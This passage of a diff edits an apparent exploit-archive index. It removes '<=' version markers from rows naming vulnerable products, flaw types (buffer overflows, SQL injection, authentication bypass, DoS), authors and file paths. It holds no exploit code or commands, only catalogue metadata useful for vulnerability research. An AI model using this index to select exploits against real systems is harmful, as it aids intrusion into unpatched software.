Etelavuori",linux,local,0 -19316,platforms/irix/remote/19316.c,"SGI IRIX <= 6.5.2 nsd",1999-05-31,"Jefferson Ogata",irix,remote,0 +19309,platforms/aix/local/19309.c,"IBM AIX 4.2 lchangelv Buffer Overflow",1997-07-21,"Bryan P. Self",aix,local,0 +19310,platforms/irix/local/19310.c,"SGI IRIX 6.4 login",1997-05-26,"David Hedley",irix,local,0 +19311,platforms/linux/local/19311.c,"RedHat Linux 4.2_SGI IRIX 6.3_Solaris 2.6 mailx - (1)",1998-06-20,"Alvaro Martinez Echevarria",linux,local,0 +19312,platforms/linux/local/19312.c,"RedHat Linux 4.2_SGI IRIX 6.3_Solaris 2.6 mailx - (2)",1998-06-25,segv,linux,local,0 +19313,platforms/irix/local/19313.txt,"SGI IRIX 6.4 netprint",1997-01-04,"Yuri Volobuev",irix,local,0 +19314,platforms/linux/local/19314.c,"RedHat Linux 5.0/5.1/5.2_ Slackware Linux 3.5 - klogd Buffer Overflow (1)",1999-02-26,"Michal Zalewski",linux,local,0 +19315,platforms/linux/local/19315.c,"RedHat Linux 5.0/5.1/5.2_Slackware Linux 3.5 klogd Buffer Overflow (2)",1999-02-26,"Esa Etelavuori",linux,local,0 +19316,platforms/irix/remote/19316.c,"SGI IRIX 6.5.2 nsd",1999-05-31,"Jefferson Ogata",irix,remote,0 19317,platforms/irix/local/19317.c,"SGI IRIX 5.3/6.2 ordist",1997-05-24,"Yuri Volobuev",irix,local,0 -19318,platforms/aix/local/19318.c,"SGI IRIX <= 6.4 permissions Buffer Overflow",1997-05-26,"David Hedley",aix,local,0 +19318,platforms/aix/local/19318.c,"SGI IRIX 6.4 permissions Buffer Overflow",1997-05-26,"David Hedley",aix,local,0 19319,platforms/irix/local/19319.c,"SGI IRIX 5.3 pkgadjust",1996-09-23,"Hui-Hui Hu",irix,local,0 19411,platforms/bsd/local/19411.txt,"BSDI BSD/OS 4.0_FreeBSD 3.2_NetBSD 1.4 x86_OpenBSD 2.5 UFS Secure Level 1",1999-07-02,Stealth,bsd,local,0 19412,platforms/windows/local/19412.c,"Qbik WinGate 3.0 Registry",1999-02-22,Chris,windows,local,0 19410,platforms/windows/dos/19410.py,"Qbik WinGate 3.0/Pro 4.0.1/Standard 4.0.1 - Buffer Overflow DoS",1999-02-22,Prizm,windows,dos,0 19406,platforms/linux/webapps/19406.txt,"symantec Web gateway 5.0.2.8 - Multiple Vulnerabilities",2012-06-27,"S2 Crew",linux,webapps,0 19321,platforms/windows/webapps/19321.txt,"IBM System Storage DS Storage Manager Profiler - Multiple Vulnerabilities",2012-06-21,LiquidWorm,windows,webapps,0 -19322,platforms/windows/remote/19322.rb,"Apple iTunes <= 10.6.1.7 Extended m3u Stack Buffer Overflow (Metasploit)",2012-06-21,Rh0,windows,remote,0 +19322,platforms/windows/remote/19322.rb,"Apple iTunes 10.6.1.7 Extended m3u Stack Buffer Overflow (Metasploit)",2012-06-21,Rh0,windows,remote,0 19326,platforms/solaris/local/19326.txt,"Sun Solaris 7.0 procfs",1999-03-09,"Toomas Soome",solaris,local,0 19323,platforms/windows/local/19323.c,"URL Hunter Buffer Overflow DEP Bypass",2012-06-21,Ayrbyte,windows,local,0 19324,platforms/php/webapps/19324.txt,"traq 2.3.5 - Multiple Vulnerabilities",2012-06-21,AkaStep,php,webapps,0 19325,platforms/php/webapps/19325.txt,"Commentics 2.0 - Multiple Vulnerabilities",2012-06-21,"Jean Pascal Pereira",php,webapps,0 -19327,platforms/solaris/remote/19327.c,"Sun Solaris <= 2.5.1 rpc.statd rpc Call Relaying",1999-06-07,anonymous,solaris,remote,0 +19327,platforms/solaris/remote/19327.c,"Sun Solaris 2.5.1 rpc.statd rpc Call Relaying",1999-06-07,anonymous,solaris,remote,0 19328,platforms/windows/dos/19328.txt,"Qutecom Softphone 2.2.1 Heap Overflow DoS/Crash Proof of Concept",2012-06-22,"Debasish Mandal",windows,dos,0 19329,platforms/php/webapps/19329.txt,"agora project 2.13.1 - Multiple Vulnerabilities",2012-06-22,"Chris Russell",php,webapps,0 19330,platforms/php/webapps/19330.txt,"LimeSurvey 1.92+ build120620 - Multiple Vulnerabilities",2012-06-22,dun,php,webapps,0 @@ -16734,40 +16734,40 @@ id,file,description,date,author,platform,type,port 19338,platforms/windows/dos/19338.txt,"XnView 1.98.8 TIFF Image Processing Heap Overflow (2)",2012-06-22,"Francis Provencher",windows,dos,0 19339,platforms/windows/webapps/19339.txt,"SoftPerfect Bandwidth Manager 2.9.10 - Authentication Bypass",2012-06-22,Gitsnik,windows,webapps,0 19340,platforms/windows/dos/19340.txt,"Lattice Diamond Programmer 1.4.2 - Buffer Overflow",2012-06-22,"Core Security",windows,dos,0 -19341,platforms/solaris/local/19341.c,"Solaris <= 2.5.1 kcms Buffer Overflow (1)",1998-12-24,"Cheez Whiz",solaris,local,0 -19342,platforms/solaris/local/19342.c,"Solaris <= 2.5.1 kcms Buffer Overflow (2)",1998-12-24,UNYUN,solaris,local,0 -19343,platforms/solaris/local/19343.c,"Solaris <= 2.5.1 rsh socket descriptor",1997-06-19,"Alan Cox",solaris,local,0 -19344,platforms/aix/local/19344.sh,"IBM AIX <= 3.2.5 IFS",1994-04-02,anonymous,aix,local,0 -19345,platforms/aix/local/19345.txt,"IBM AIX <= 4.2.1 lquerypv",1996-11-24,Aleph1,aix,local,0 -19346,platforms/freebsd/local/19346.c,"FreeBSD <= 3.1_Solaris <= 2.6 Domain Socket",1997-06-19,"Thamer Al-Herbish",freebsd,local,0 -19347,platforms/irix/local/19347.c,"SGI IRIX <= 6.3 pset",1997-07-17,"Last Stage of Delirium",irix,local,0 -19348,platforms/aix/remote/19348.txt,"IBM AIX <= 3.2.5 login(1)",1996-12-04,anonymous,aix,remote,0 -19349,platforms/irix/local/19349.txt,"SGI IRIX <= 6.4 rmail",1997-05-07,"Yuri Volobuev",irix,local,0 -19350,platforms/solaris/local/19350.sh,"Solaris <= 2.5.1 License Manager",1998-10-21,"Joel Eriksson",solaris,local,0 +19341,platforms/solaris/local/19341.c,"Solaris 2.5.1 kcms Buffer Overflow (1)",1998-12-24,"Cheez Whiz",solaris,local,0 +19342,platforms/solaris/local/19342.c,"Solaris 2.5.1 kcms Buffer Overflow (2)",1998-12-24,UNYUN,solaris,local,0 +19343,platforms/solaris/local/19343.c,"Solaris 2.5.1 rsh socket descriptor",1997-06-19,"Alan Cox",solaris,local,0 +19344,platforms/aix/local/19344.sh,"IBM AIX 3.2.5 IFS",1994-04-02,anonymous,aix,local,0 +19345,platforms/aix/local/19345.txt,"IBM AIX 4.2.1 lquerypv",1996-11-24,Aleph1,aix,local,0 +19346,platforms/freebsd/local/19346.c,"FreeBSD 3.1_Solaris 2.6 Domain Socket",1997-06-19,"Thamer Al-Herbish",freebsd,local,0 +19347,platforms/irix/local/19347.c,"SGI IRIX 6.3 pset",1997-07-17,"Last Stage of Delirium",irix,local,0 +19348,platforms/aix/remote/19348.txt,"IBM AIX 3.2.5 login(1)",1996-12-04,anonymous,aix,remote,0 +19349,platforms/irix/local/19349.txt,"SGI IRIX 6.4 rmail",1997-05-07,"Yuri Volobuev",irix,local,0 +19350,platforms/solaris/local/19350.sh,"Solaris 2.5.1 License Manager",1998-10-21,"Joel Eriksson",solaris,local,0 19351,platforms/irix/local/19351.sh,"SGI IRIX 5.2/5.3 serial_ports",1994-02-02,transit,irix,local,0 19407,platforms/windows/remote/19407.py,"Symantec PcAnywhere 12.5.0 Login and Password Field Buffer Overflow",2012-06-27,"S2 Crew",windows,remote,0 -19353,platforms/irix/local/19353.txt,"SGI IRIX <= 6.4 suid_exec",1996-12-02,"Yuri Volobuev",irix,local,0 +19353,platforms/irix/local/19353.txt,"SGI IRIX 6.4 suid_exec",1996-12-02,"Yuri Volobuev",irix,local,0 19354,platforms/aix/local/19354.txt,"SGI IRIX 5.1/5.2 sgihelp",1996-12-02,anonymous,aix,local,0 -19355,platforms/irix/local/19355.txt,"SGI IRIX <= 6.4 startmidi Vulnerabilty",1997-02-09,"David Hedley",irix,local,0 -19356,platforms/irix/local/19356.txt,"SGI IRIX <= 6.3 Systour and OutOfBox Vulnerabilities",1996-10-30,"Tun-Hui Hu",irix,local,0 +19355,platforms/irix/local/19355.txt,"SGI IRIX 6.4 startmidi",1997-02-09,"David Hedley",irix,local,0 +19356,platforms/irix/local/19356.txt,"SGI IRIX 6.3 Systour and OutOfBox Vulnerabilities",1996-10-30,"Tun-Hui Hu",irix,local,0 19357,platforms/irix/dos/19357.sh,"SGI IRIX 6.2 SpaceWare",1996-10-30,"J.A. Guitierrez",irix,dos,0 -19358,platforms/irix/local/19358.txt,"SGI IRIX <= 6.4 xfsdump",1997-05-07,"Yuri Volobuev",irix,local,0 +19358,platforms/irix/local/19358.txt,"SGI IRIX 6.4 xfsdump",1997-05-07,"Yuri Volobuev",irix,local,0 19359,platforms/windows/local/19359.txt,"Microsoft Windows NT 4.0/SP1/SP2/SP3/SP4_Windows NT 3.5.1/SP1/SP2/SP3/SP4/SP5 Screensaver",1999-03-10,"Cybermedia Software Private Limited",windows,local,0 19360,platforms/linux/local/19360.c,"Linux libc 5.3.12/5.4_RedHat Linux 4.0 vsyslog() Buffer Overflow",1997-12-21,"Solar Designer",linux,local,0 19361,platforms/windows/remote/19361.txt,"Microsoft IIS 3.0/4.0 Double Byte Code Page",1999-06-24,Microsoft,windows,remote,0 -19362,platforms/sco/local/19362.c,"SCO Open Server <= 5.0.5 XBase Buffer Overflow Vulnerabilities",1999-06-14,doble,sco,local,0 +19362,platforms/sco/local/19362.c,"SCO Open Server 5.0.5 XBase Buffer Overflow Vulnerabilities",1999-06-14,doble,sco,local,0 19363,platforms/multiple/remote/19363.txt,"Netscape FastTrack Server 3.0.1 Fasttrack Root Directory Listing",1999-06-07,"Jesús López de Aguileta",multiple,remote,0 19364,platforms/netware/local/19364.txt,"Novell Netware 4.1/4.11 SP5B Remote.NLM Weak Encryption",1999-04-09,dreamer,netware,local,0 19365,platforms/netware/remote/19365.txt,"Novell Netware 4.1/4.11 SP5B NDS Default Rights",1999-04-09,"Simple Nomad",netware,remote,0 -19384,platforms/linux/local/19384.c,"Debian Linux <= 2.1 - Print Queue Control",1999-07-02,"Chris Leishman",linux,local,0 +19384,platforms/linux/local/19384.c,"Debian Linux 2.1 - Print Queue Control",1999-07-02,"Chris Leishman",linux,local,0 19368,platforms/multiple/dos/19368.sh,"Lotus Domino 4.6.1/4.6.4 Notes SMTPA MTA Mail Relay",1999-06-15,"Robert Lister",multiple,dos,0 19369,platforms/windows/remote/19369.rb,"Adobe Flash Player Object Type Confusion",2012-06-25,Metasploit,windows,remote,0 19370,platforms/linux/local/19370.c,"Xi Graphics Accelerated X 4.0.x / 5.0 - Buffer Overflow Vulnerabilities",1999-06-25,KSR[T],linux,local,0 19371,platforms/linux/local/19371.c,"VMWare 1.0.1 - Buffer Overflow",1999-06-25,funkysh,linux,local,0 19372,platforms/windows/dos/19372.txt,"Microsoft Windows NT 4.0/SP 1/SP 2/SP 3/SP 4/SP 5 Null Session Admin Name",1999-06-28,"J D Glaser",windows,dos,0 -19373,platforms/linux/local/19373.c,"Debian Linux 2.0/2.0 r5 / FreeBSD <= 3.2 / OpenBSD 2.4 / RedHat Linux 5.2 i386 / S.u.S.E. Linux <= 6.1 - Lsof Buffer Overflow (1)",1999-02-17,c0nd0r,linux,local,0 -19374,platforms/linux/local/19374.c,"Debian Linux 2.0/2.0 r5 / FreeBSD <= 3.2 / OpenBSD 2.4 / RedHat Linux 5.2 i386 / S.u.S.E. Linux <= 6.1 - Lsof Buffer Overflow (2)",1999-02-17,Zhodiac,linux,local,0 -19383,platforms/multiple/remote/19383.txt,"Qbik WinGate Standard <= 3.0.5 Log Service Directory Traversal",1999-02-22,eEYe,multiple,remote,0 +19373,platforms/linux/local/19373.c,"Debian Linux 2.0/2.0 r5 / FreeBSD 3.2 / OpenBSD 2.4 / RedHat Linux 5.2 i386 / S.u.S.E. Linux 6.1 - Lsof Buffer Overflow (1)",1999-02-17,c0nd0r,linux,local,0 +19374,platforms/linux/local/19374.c,"Debian Linux 2.0/2.0 r5 / FreeBSD 3.2 / OpenBSD 2.4 / RedHat Linux 5.2 i386 / S.u.S.E. Linux 6.1 - Lsof Buffer Overflow (2)",1999-02-17,Zhodiac,linux,local,0 +19383,platforms/multiple/remote/19383.txt,"Qbik WinGate Standard 3.0.5 Log Service Directory Traversal",1999-02-22,eEYe,multiple,remote,0 19382,platforms/multiple/dos/19382.txt,"Ipswitch IMail 5.0 Whois32 Daemon Buffer Overflow DoS",1999-03-01,"Marc of eEye",multiple,dos,0 19376,platforms/windows/local/19376.txt,"Microsoft IIS 2.0/3.0/4.0 - ISAPI GetExtensionVersion()",1999-03-08,"Fabien Royer",windows,local,0 19377,platforms/multiple/dos/19377.txt,"Ipswitch IMail 5.0 Imapd Buffer Overflow DoS",1999-03-01,"Marc of eEye",multiple,dos,0 @@ -16778,28 +16778,28 @@ id,file,description,date,author,platform,type,port 19394,platforms/asp/webapps/19394.txt,"Parodia 6.8 employer-profile.asp SQL Injection",2012-06-25,"Carlos Mario Penagos Hollmann",asp,webapps,0 19398,platforms/php/webapps/19398.txt,"WordPress Fancy Gallery Plugin 1.2.4 - Arbitrary File Upload",2012-06-25,"Sammy FORGIT",php,webapps,0 19408,platforms/php/webapps/19408.txt,"Zend Framework Local File Disclosure",2012-06-27,"SEC Consult",php,webapps,0 -19403,platforms/php/webapps/19403.rb,"SugarCRM <= 6.3.1 unserialize() PHP Code Execution",2012-06-26,Metasploit,php,webapps,0 +19403,platforms/php/webapps/19403.rb,"SugarCRM 6.3.1 unserialize() PHP Code Execution",2012-06-26,Metasploit,php,webapps,0 29039,platforms/windows/dos/29039.py,"Kerio MailServer 5.x/6.x - Remote LDAP Denial of Service",2006-11-15,"Evgeny Legerov",windows,dos,0 19409,platforms/windows/dos/19409.txt,"Sielco Sistemi Winlog 2.07.16 - Multiple Vulnerabilities",2012-06-27,"Luigi Auriemma",windows,dos,0 -19414,platforms/windows/dos/19414.c,"Windows 95/98_Windows NT Enterprise Server <= 4.0 SP5_Windows NT Terminal Server <= 4.0 SP4_Windows NT Workstation <= 4.0 SP5 - (2)",1999-07-03,klepto,windows,dos,0 -19415,platforms/windows/dos/19415.c,"Windows 95/98_Windows NT Enterprise Server <= 4.0 SP5_Windows NT Terminal Server <= 4.0 SP4_Windows NT Workstation <= 4.0 SP5 - (3)",1999-04-06,"Rob Mosher",windows,dos,0 -19416,platforms/windows/dos/19416.c,"Netscape Enterprise Server <= 3.6 SSL Buffer Overflow DoS",1999-07-06,"Arne Vidstrom",windows,dos,0 -19417,platforms/osx/local/19417.txt,"Apple Mac OS <= 8 8.6 Weak Password Encryption",1999-07-10,"Dawid adix Adamski",osx,local,0 -19418,platforms/aix/local/19418.txt,"IBM AIX <= 4.3.1 adb",1999-07-12,"GZ Apple",aix,local,0 +19414,platforms/windows/dos/19414.c,"Windows 95/98_Windows NT Enterprise Server 4.0 SP5_Windows NT Terminal Server 4.0 SP4_Windows NT Workstation 4.0 SP5 - (2)",1999-07-03,klepto,windows,dos,0 +19415,platforms/windows/dos/19415.c,"Windows 95/98_Windows NT Enterprise Server 4.0 SP5_Windows NT Terminal Server 4.0 SP4_Windows NT Workstation 4.0 SP5 - (3)",1999-04-06,"Rob Mosher",windows,dos,0 +19416,platforms/windows/dos/19416.c,"Netscape Enterprise Server 3.6 SSL Buffer Overflow DoS",1999-07-06,"Arne Vidstrom",windows,dos,0 +19417,platforms/osx/local/19417.txt,"Apple Mac OS 8 8.6 Weak Password Encryption",1999-07-10,"Dawid adix Adamski",osx,local,0 +19418,platforms/aix/local/19418.txt,"IBM AIX 4.3.1 adb",1999-07-12,"GZ Apple",aix,local,0 19419,platforms/linux/local/19419.c,"Linux Kernel 2.0.37 - Segment Limit Local Root",1999-07-13,Solar,linux,local,0 -19420,platforms/multiple/remote/19420.c,"Caldera OpenUnix 8.0/UnixWare 7.1.1_HP HP-UX <= 11.0_Solaris <= 7.0_SunOS <= 4.1.4 rpc.cmsd Buffer Overflow (1)",1999-07-13,"Last Stage of Delirium",multiple,remote,0 -19421,platforms/multiple/remote/19421.c,"Caldera OpenUnix 8.0/UnixWare 7.1.1_HP HP-UX <= 11.0_Solaris <= 7.0_SunOS <= 4.1.4 rpc.cmsd Buffer Overflow (2)",1999-07-13,jGgM,multiple,remote,0 -19422,platforms/linux/local/19422.txt,"BMC Software Patrol <= 3.2.5 Patrol SNMP Agent File Creation/Permission",1999-07-14,"Andrew Alness",linux,local,0 -19423,platforms/multiple/dos/19423.c,"Linux Kernel <= 2.3 (BSD/OS <= 4.0 / FreeBSD <= 3.2 / NetBSD <= 1.4) - Shared Memory Denial of Service",1999-07-15,"Mike Perry",multiple,dos,0 +19420,platforms/multiple/remote/19420.c,"Caldera OpenUnix 8.0/UnixWare 7.1.1_HP HP-UX 11.0_Solaris 7.0_SunOS 4.1.4 rpc.cmsd Buffer Overflow (1)",1999-07-13,"Last Stage of Delirium",multiple,remote,0 +19421,platforms/multiple/remote/19421.c,"Caldera OpenUnix 8.0/UnixWare 7.1.1_HP HP-UX 11.0_Solaris 7.0_SunOS 4.1.4 rpc.cmsd Buffer Overflow (2)",1999-07-13,jGgM,multiple,remote,0 +19422,platforms/linux/local/19422.txt,"BMC Software Patrol 3.2.5 Patrol SNMP Agent File Creation/Permission",1999-07-14,"Andrew Alness",linux,local,0 +19423,platforms/multiple/dos/19423.c,"Linux Kernel 2.3 (BSD/OS 4.0 / FreeBSD 3.2 / NetBSD 1.4) - Shared Memory Denial of Service",1999-07-15,"Mike Perry",multiple,dos,0 19424,platforms/windows/remote/19424.pl,"Microsoft Data Access Components (MDAC) <= 2.1_Microsoft IIS 3.0/4.0_Microsoft Index Server 2.0_Microsoft Site Server Commerce Edition 3.0 i386 MDAC RDS (1)",1999-07-19,"rain forest puppy",windows,remote,0 19425,platforms/windows/local/19425.txt,"Microsoft Data Access Components (MDAC) <= 2.1_Microsoft IIS 3.0/4.0_Microsoft Index Server 2.0_Microsoft Site Server Commerce Edition 3.0 i386 MDAC RDS (2)",1999-07-19,"Wanderley J. Abreu Jr",windows,local,0 -19426,platforms/multiple/remote/19426.c,"SGI Advanced Linux Environment 3.0_SGI IRIX <= 6.5.4_SGI UNICOS <= 10.0 6 - arrayd.auth Default Configuration",1999-07-19,"Last Stage of Delirium",multiple,remote,0 +19426,platforms/multiple/remote/19426.c,"SGI Advanced Linux Environment 3.0_SGI IRIX 6.5.4_SGI UNICOS 10.0 6 - arrayd.auth Default Configuration",1999-07-19,"Last Stage of Delirium",multiple,remote,0 19427,platforms/osx/local/19427.txt,"Apple At Ease 5.0",1999-05-13,"Tim Conrad",osx,local,0 19428,platforms/linux/local/19428.c,"Samba Pre-2.0.5 Vulnerabilities",1999-07-21,"Gerald Britton",linux,local,0 19429,platforms/linux/local/19429.sh,"Rational Software ClearCase for Unix 3.2 ClearCase SUID",1999-05-02,Mudge,linux,local,0 -19430,platforms/multiple/local/19430.txt,"GNU groff 1.11 a_HP-UX 10.0/11.0_SGI IRIX <= 6.5.3 Malicious Manpage Vulnerabilities",1999-07-25,"Pawel Wilk",multiple,local,0 -19431,platforms/php/webapps/19431.txt,"webERP <= 4.08.1 - Local/Remote File Inclusion",2012-06-28,dun,php,webapps,0 -19432,platforms/jsp/webapps/19432.rb,"Openfire <= 3.6.0a Admin Console Authentication Bypass",2012-06-28,Metasploit,jsp,webapps,0 +19430,platforms/multiple/local/19430.txt,"GNU groff 1.11 a_HP-UX 10.0/11.0_SGI IRIX 6.5.3 Malicious Manpage Vulnerabilities",1999-07-25,"Pawel Wilk",multiple,local,0 +19431,platforms/php/webapps/19431.txt,"webERP 4.08.1 - Local/Remote File Inclusion",2012-06-28,dun,php,webapps,0 +19432,platforms/jsp/webapps/19432.rb,"Openfire 3.6.0a Admin Console Authentication Bypass",2012-06-28,Metasploit,jsp,webapps,0 19433,platforms/windows/local/19433.rb,"Apple QuickTime TeXML Stack Buffer Overflow",2012-06-28,Metasploit,windows,local,0 19434,platforms/osx/local/19434.txt,"Quinn 'the Eskimo' and Peter N. Lewis Internet Config 1.0/2.0 Weak Password Encryption",1999-07-28,"Dawid adix Adamski",osx,local,0 19435,platforms/windows/remote/19435.html,"Microsoft JET 3.5/3.51/4.0 VBA Shell",1999-07-29,BrootForce,windows,remote,0 @@ -16814,24 +16814,24 @@ id,file,description,date,author,platform,type,port 19444,platforms/hardware/remote/19444.txt,"Network Security Wizards Dragon-Fire IDS 1.0",1999-08-05,"Stefan Lauda",hardware,remote,0 19445,platforms/windows/dos/19445.txt,"Microsoft FrontPage Personal WebServer 1.0 PWS DoS",1999-08-08,Narr0w,windows,dos,0 19446,platforms/multiple/dos/19446.pl,"WebTrends Enterprise Reporting Server 1.5 Negative Content Length DoS",1999-08-08,rpc,multiple,dos,0 -19447,platforms/multiple/local/19447.c,"NetBSD <= 1.4 / OpenBSD <= 2.5 /Solaris <= 7.0 profil(2) - Exploit",1999-08-09,"Ross Harvey",multiple,local,0 +19447,platforms/multiple/local/19447.c,"NetBSD 1.4 / OpenBSD 2.5 /Solaris 7.0 profil(2) - Exploit",1999-08-09,"Ross Harvey",multiple,local,0 19448,platforms/windows/remote/19448.c,"ToxSoft NextFTP 1.82 - Buffer Overflow",1999-08-03,UNYUN,windows,remote,0 19449,platforms/windows/remote/19449.c,"Fujitsu Chocoa 1.0 beta7R - 'Topic' Buffer Overflow",1999-08-03,UNYUN,windows,remote,0 19450,platforms/windows/remote/19450.c,"CREAR ALMail32 1.10 - Buffer Overflow",1999-08-08,UNYUN,windows,remote,0 19451,platforms/multiple/remote/19451.txt,"Microsoft Windows 98 a/98 b/98SE_Solaris 2.6 IRDP",1999-08-11,L0pth,multiple,remote,0 19452,platforms/php/webapps/19452.txt,"phpmoneybooks 1.03 - Stored XSS",2012-06-29,chap0,php,webapps,0 19453,platforms/windows/dos/19453.cpp,"PC Tools Firewall Plus 7.0.0.123 - Local DoS",2012-06-29,0in,windows,dos,0 -19455,platforms/windows/webapps/19455.txt,"specview <= 2.5 build 853 - Directory Traversal",2012-06-29,"Luigi Auriemma",windows,webapps,0 -19456,platforms/windows/dos/19456.txt,"PowerNet Twin Client <= 8.9 - (RFSync 1.0.0.1) Crash PoC",2012-06-29,"Luigi Auriemma",windows,dos,0 +19455,platforms/windows/webapps/19455.txt,"specview 2.5 build 853 - Directory Traversal",2012-06-29,"Luigi Auriemma",windows,webapps,0 +19456,platforms/windows/dos/19456.txt,"PowerNet Twin Client 8.9 - (RFSync 1.0.0.1) Crash PoC",2012-06-29,"Luigi Auriemma",windows,dos,0 19457,platforms/multiple/dos/19457.txt,"Microsoft Commercial Internet System 2.0/2.5_IIS 4.0_Site Server Commerce Edition 3.0 alpha/3.0 DoS",1999-08-11,"Nobuo Miwa",multiple,dos,0 19458,platforms/linux/remote/19458.c,"Linux Kernel 2.0.30/2.0.35/2.0.36/2.0.37 - Blind TCP Spoofing",1999-07-31,Nergal,linux,remote,0 19459,platforms/multiple/remote/19459.txt,"Hybrid Ircd 5.0.3 p7 - Buffer Overflow",1999-08-13,"jduck and stranjer",multiple,remote,0 -19460,platforms/multiple/local/19460.sh,"Oracle <= 8 8.1.5 - Intelligent Agent (1)",1999-08-16,"Brock Tellier",multiple,local,0 -19461,platforms/multiple/local/19461.c,"Oracle <= 8 8.1.5 - Intelligent Agent (2)",1999-08-16,"Gilles PARC",multiple,local,0 +19460,platforms/multiple/local/19460.sh,"Oracle 8 8.1.5 - Intelligent Agent (1)",1999-08-16,"Brock Tellier",multiple,local,0 +19461,platforms/multiple/local/19461.c,"Oracle 8 8.1.5 - Intelligent Agent (2)",1999-08-16,"Gilles PARC",multiple,local,0 19462,platforms/windows/local/19462.c,"Microsoft Windows 95/98 IE5/Telnet Heap Overflow",1999-08-16,"Jeremy Kothe",windows,local,0 -19463,platforms/linux/dos/19463.c,"S.u.S.E. Linux <= 6.2 / Slackware Linux 3.2/3.6 - identd Denial of Service",1999-08-16,friedolin,linux,dos,0 -19464,platforms/linux/local/19464.c,"RedHat Linux <= 6.0 / Slackware Linux <= 4.0 - Termcap tgetent() Buffer Overflow (1)",1999-08-18,m0f0,linux,local,0 -19465,platforms/linux/local/19465.c,"RedHat Linux <= 6.0 / Slackware Linux <= 4.0 - Termcap tgetent() Buffer Overflow (2)",1999-08-18,sk8,linux,local,0 +19463,platforms/linux/dos/19463.c,"S.u.S.E. Linux 6.2 / Slackware Linux 3.2/3.6 - identd Denial of Service",1999-08-16,friedolin,linux,dos,0 +19464,platforms/linux/local/19464.c,"RedHat Linux 6.0 / Slackware Linux 4.0 - Termcap tgetent() Buffer Overflow (1)",1999-08-18,m0f0,linux,local,0 +19465,platforms/linux/local/19465.c,"RedHat Linux 6.0 / Slackware Linux 4.0 - Termcap tgetent() Buffer Overflow (2)",1999-08-18,sk8,linux,local,0 19466,platforms/multiple/remote/19466.txt,"Hughes Technologies Mini SQL (mSQL) 2.0/2.0.10",1999-08-18,"Gregory Duchemin",multiple,remote,0 19467,platforms/linux/local/19467.c,"GNU glibc 2.1/2.1.1 -6 - pt_chown",1999-08-23,"Michal Zalewski",linux,local,0 19468,platforms/windows/remote/19468.txt,"Microsoft Internet Explorer 5.0 - ActiveX 'Object for constructing type libraries for scriptlets'",1999-08-21,"Georgi Guninski",windows,remote,0 @@ -16840,13 +16840,13 @@ id,file,description,date,author,platform,type,port 19471,platforms/windows/dos/19471.html,"Microsoft Internet Explorer 5.0 HTML Form Control DoS",1999-08-27,"Neon Bunny",windows,dos,0 19472,platforms/windows/local/19472.txt,"IBM GINA for NT 1.0 Privilege Escalation",1999-08-23,"Frank Pikelner",windows,local,0 19473,platforms/windows/local/19473.txt,"Microsoft Internet Explorer 5.0 FTP Password Storage",1999-08-25,"Makoto Shiotsuki",windows,local,0 -19474,platforms/linux/local/19474.txt,"Caldera OpenLinux 2.2 / Debian 2.1/2.2 / RedHat <= 6.0 - Vixie Cron MAILTO Sendmail",1999-08-25,"Olaf Kirch",linux,local,0 +19474,platforms/linux/local/19474.txt,"Caldera OpenLinux 2.2 / Debian 2.1/2.2 / RedHat 6.0 - Vixie Cron MAILTO Sendmail",1999-08-25,"Olaf Kirch",linux,local,0 19475,platforms/linux/remote/19475.c,"ProFTPD 1.2 pre1/pre2/pre3/pre4/pre5 - Remote Buffer Overflow (1)",1999-08-17,"babcia padlina ltd",linux,remote,0 19476,platforms/linux/remote/19476.c,"ProFTPD 1.2 pre1/pre2/pre3/pre4/pre5 - Remote Buffer Overflow (2)",1999-08-27,anonymous,linux,remote,0 19477,platforms/hardware/dos/19477.txt,"TFS Gateway 4.0 - Denial of Service",1999-08-31,anonymous,hardware,dos,0 -19478,platforms/unix/remote/19478.c,"BSD/OS 3.1/4.0.1_FreeBSD 3.0/3.1/3.2_RedHat Linux <= 6.0 amd Buffer Overflow (1)",1999-08-31,Taeho,unix,remote,0 -19479,platforms/unix/remote/19479.c,"BSD/OS 3.1/4.0.1_FreeBSD 3.0/3.1/3.2_RedHat Linux <= 6.0 amd Buffer Overflow (2)",1999-08-30,c0nd0r,unix,remote,0 -19480,platforms/multiple/local/19480.c,"ISC INN <= 2.2_RedHat Linux <= 6.0 inews Buffer Overflow",1999-09-02,bawd,multiple,local,0 +19478,platforms/unix/remote/19478.c,"BSD/OS 3.1/4.0.1_FreeBSD 3.0/3.1/3.2_RedHat Linux 6.0 amd Buffer Overflow (1)",1999-08-31,Taeho,unix,remote,0 +19479,platforms/unix/remote/19479.c,"BSD/OS 3.1/4.0.1_FreeBSD 3.0/3.1/3.2_RedHat Linux 6.0 amd Buffer Overflow (2)",1999-08-30,c0nd0r,unix,remote,0 +19480,platforms/multiple/local/19480.c,"ISC INN 2.2_RedHat Linux 6.0 inews Buffer Overflow",1999-09-02,bawd,multiple,local,0 19481,platforms/php/webapps/19481.txt,"WordPress Paid Business Listings 1.0.2 - Blind SQL Injection",2012-06-30,"Chris Kellum",php,webapps,0 19482,platforms/multiple/dos/19482.txt,"GIMP 2.8.0 FIT File Format DoS",2012-06-30,"Joseph Sheridan",multiple,dos,0 19483,platforms/windows/dos/19483.txt,"IrfanView JLS Formats PlugIn Heap Overflow",2012-06-30,"Joseph Sheridan",windows,dos,0 @@ -16854,7 +16854,7 @@ id,file,description,date,author,platform,type,port 19485,platforms/linux/local/19485.c,"Martin Stover Mars NWE 0.99 - Buffer Overflow Vulnerabilities",1999-08-31,"Przemyslaw Frasunek",linux,local,0 19486,platforms/windows/remote/19486.c,"Netscape Communicator 4.06/4.5/4.6/4.51/4.61 EMBED Buffer Overflow",1999-09-02,"R00t Zer0",windows,remote,0 19487,platforms/windows/remote/19487.txt,"Microsoft Internet Explorer 4.0/5.0 - ActiveX 'Eyedog'",1999-08-21,"Shane Hird's",windows,remote,0 -19488,platforms/bsd/dos/19488.c,"FreeBSD <= 5.0_NetBSD <= 1.4.2_OpenBSD <= 2.7 setsockopt() - DoS",1999-09-05,"L. Sassaman",bsd,dos,0 +19488,platforms/bsd/dos/19488.c,"FreeBSD 5.0_NetBSD 1.4.2_OpenBSD 2.7 setsockopt() - DoS",1999-09-05,"L. Sassaman",bsd,dos,0 19489,platforms/windows/dos/19489.txt,"Microsoft Windows NT 4.0 DCOM Server",1999-09-08,Mnemonix,windows,dos,0 19490,platforms/windows/remote/19490.txt,"Microsoft Internet Explorer 4.0.1/5.0 Import/Export Favorites",1999-09-10,"Georgi Guninski",windows,remote,0 19491,platforms/windows/remote/19491.txt,"BindView HackerShield 1.0/1.1 HackerShield AgentAdmin Password",1999-09-10,anonymous,windows,remote,0 @@ -16863,19 +16863,19 @@ id,file,description,date,author,platform,type,port 